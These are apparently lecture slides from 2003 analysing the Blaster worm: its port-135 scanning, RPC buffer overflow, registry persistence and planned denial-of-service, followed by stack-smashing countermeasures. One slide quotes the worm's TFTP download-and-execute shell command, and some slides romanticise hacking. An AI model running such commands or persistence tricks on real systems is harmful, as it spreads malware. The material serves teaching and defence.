Analysis of the Internet Worm of August 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Dr. K. Salah September 2003
INFORMATION AND COMPUTER SCIENCE DEPARTMENT Analysis of the Internet Worm of August 2003 Agenda Reasons for Talk Some Jargon Ethics of Hackers Why Can’t Our Kids Hack? Example of Hacker Attacks W32 Blaster Worm Smashing the Stack for Fun and Profit More Information
September 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Analysis of the Internet Worm of August 2003 Reasons of Talk Know Your Enemy! –Prophet of Islam says, “من تعلم لغة قوم أمن مكرهم ” –“Know your enemy and know yourself and you can fight a hundred battles without disaster,” Sun Tzu. Knowledge is power! –Understand hack tactics, strategies, and tricks. –Be better prepared –Design and write better code –Take countermeasures. Know something about the ethics of hackers Testify how smart the hackers are! Research
September 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Analysis of the Internet Worm of August 2003 Some Jargon Hoax vs. Worm vs. Virus Trojan Horse Crackers vs. Hackers vs. Intruder DOS attack
September 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Analysis of the Internet Worm of August 2003 The Hacker Ethic Hackers have ethics, according to Socrates. "The Hacker Ethic", by Pekka Himanen, Linus Torvalds, and Manuel Castells. –Translated into 15 languages –Hackers are the warriors, explorers, guerrillas, and joyous adventurers of the Digital Age, and the true architects of the new economy. Demonized and often misunderstood, they are changing the world and the way it works. –Hackers are curious and often smart. They might not agree with a law, or offer a different interpretation, or act in ways the law doesn't cover. – – Why hacking? Enjoy the challenge and excitement Joy, fun, ego, and recognition Hate Microsoft products and practices –The battle with google.com has started
September 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Analysis of the Internet Worm of August 2003 Hacker Ethics Information should be free –Driving Linux/Apache and Open Source Code –Technology is only good if you get other people join you developing and using it. Info should always be disclosed. –Not all people can afford to buy software or information –No cocern for copyright laws/abuses, intellectual property, passwords, data security! Hacking is essential to show security holes and vulnerabilities –So many hackers are security gurus –A way to make living and learn about computers Hackers are not doing real harm –Pushing technology to its knees –“We are just curious and inquistitve people… we want to chart new territory and look around,” Craig Neidorf –Craig Neidorf is the founder of Phrack Magazine and member of the 2600 club. His is
September 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Analysis of the Internet Worm of August 2003 Kids and Hacking Kids are very curious, thus are hackers. Have much more time, less responsibilities! They look for recognition and fun Usually kids fall victims and get caught first Originators of attacks are yet to be found What does it really take to be a hacker? –Some knowledge of C and Assembly programming –Some knowledge of OS –Some knowledge of Networking (TCP/IP) –(Beware!!! These are our ICS and COE students!!!)
September 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Analysis of the Internet Worm of August 2003 Kids and Hacking
September 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Analysis of the Internet Worm of August 2003 Kids and Hacking Connected to
September 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Analysis of the Internet Worm of August 2003 Kids and Hacking Shall we give up hope? –The 1998 registrar incident So, why can’t Our kids hack? –Digital Divide –English –Busy and distracted….
September 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Analysis of the Internet Worm of August 2003 Fun, Attacks, or Damages
September 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Analysis of the Internet Worm of August 2003 Fun, Attacks, or Damages
September 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Analysis of the Internet Worm of August 2003 Fun, Attacks, or Damages August 17, 1996
September 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Analysis of the Internet Worm of August 2003 Fun, Attacks, or Damages August 14, 2003
September 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Analysis of the Internet Worm of August 2003 Fun, Attacks, or Damages August 14, 2003
September 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Analysis of the Internet Worm of August 2003 The Blaster Worm Affected Windows XP and Windows 2000 Causes Windows NT to crash when trying to exploit NT machines Has so many variants: Blaster-A, Blaster-B, …Blaster-F –Blaster-F was linked to a Romanian student This is a worm, not a virus. Eating up network bandwidth. Encouraged other hackers to release other worms: Sobig, Welchia, etc. Microsoft called it, “A security issue has been identified…”
September 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Analysis of the Internet Worm of August 2003 Technical Details 1) An infected system scans the network for any computer listening to TCP port 135 (Windows RPC/DCOM port). –TCP port 135 used for Microsoft Active Directory and Microsoft Exchange mail servers, among other things. –“The Art of Port Scanning” by Phrack Magazine,
September 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Analysis of the Internet Worm of August 2003 Technical Details 2) The infected system attempts to exploit the RPC buffer overflow on those systems listening to TCP port 135. –Buffer Overflow Attack will be explained later
September 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Analysis of the Internet Worm of August 2003 Technical Details 3) The buffer overflow includes code which causes the victim to open a cmd.exe shell (an egg) and cause it to (hatch): –starts a TFTP session with the attacker between ports 4444 and 69 to download a copy of the worm “msblast.exe” –Inside the shell code, do a command: “cmd \c tftp –i appaddress worm.exe & worm.exe & exit” –“msblast.exe” is packed with UPX compression utility, self-extracting and is 11KB once unpacked.
September 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Analysis of the Internet Worm of August 2003 Technical Details 4) “msblast.exe” gets executed and starts the scanning process for those computers listening on TCP port 135. –A text string in the worm code reads, “I just want to say LOVE YOU SAN!! Billy gates why do you make this possible? Stop making money and fix your software!!” –The code creates a mutex called “BILLY” to avoid running multiple times. –It also adds an entry to always run on Windows restart SOFTWARE\Microsoft\Windows\CurrentVersion\Run\windows auto update = "msblast.exe“
September 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Analysis of the Internet Worm of August 2003 Technical Details A secondary payload in the worm is supposedly to cause all infected systems to launch a DOS attack against MS windowsupdate.com website on 16August –Why August 16? –Any relation to the DOJ Hack? If the worm cannot find a DNS entry for windowsupdate.com, it uses , causing broadcast traffic and flooding the network.
September 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Analysis of the Internet Worm of August 2003 Buffer Overflow Attack First Rule of Hacking: Do everything you are not supposed to? –If you can’t change the flow of execution, crash it! Started with Robert Morris worm in 1988 exploiting a buffer overflow vulnerability in fingerd. Code Red worm of 2001, exploiting a buffer overflow vulnerability in Mircosoft IIS (Internet Information Server). The new MS Blaster of 2003, exploiting a buffer overflow vulnerability in MS DCOM/RPC. The next attack will be most likely linked to buffer overflow CERT Security Alert by Years– upto the first 2 months of 2002
September 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Analysis of the Internet Worm of August 2003 Buffer Overflow Attack Best article on the know-how details of the buffer overflow can be found in Phrack Magazine (issue 49) titled, published in 1996: “Smashing the Stack for Fun and Profit,” by
September 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Analysis of the Internet Worm of August 2003 Buffer Overflow Attack
September 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Analysis of the Internet Worm of August 2003 Buffer Overflow Attack
September 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Analysis of the Internet Worm of August 2003 Buffer Overflow Attack Partial List of Unsafe Functions in the Standard C Library:
September 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Analysis of the Internet Worm of August 2003 Buffer Overflow Attack Countermeasures Validate all arguments or parameters received whenever you write a function. –Bounds checking –Performance is compromised!! Use secure functions instead, e.g., strncpy() and strncat() Use safe compilers –Watch out for free compilers!!! Can be made by hackers, for hackers! Test your code thoroughly Keep applying patches Good site for advisory is CERT at Carnegie Mellon SWE Institute – Can this attack be ever eliminated?
September 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Analysis of the Internet Worm of August 2003 R e s e a r c h on Protecting the Stack Good number of references is found in: – How? –Splitting control stack from data stack Control stack contains return addresses Data stack contains local variables and passed parameters –Use middleware software (libsafe) to intercept calls to libray functions known to be vulnerable. –Using StackGuard and StackShield Adding more code at the beginning and end of each function Check to see if ret address is altered and signal a violation –Others –Performance due to overhead is always as issue!
September 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Analysis of the Internet Worm of August 2003 The Adventure Continues Bypassing the fix for smashing the stack –Crispin Cowan, Steve Beattie, Ryan Finnin Day, Calton Pu, Perry Wagle and Erik Walthinsen. Protecting Systems from Stack Smashing Attacks with StackGuard –In May 2000 issue of Phrack Magazine ( “Bypassing StackGuard and StackShield” by Bulba and Kil3r
September 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Analysis of the Internet Worm of August 2003 Curious about More Hacking Techniques Compulsory Reading "Hacking Exposed"
September 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Analysis of the Internet Worm of August 2003 A copy of this PPT presentation can be found at – Under the MISC section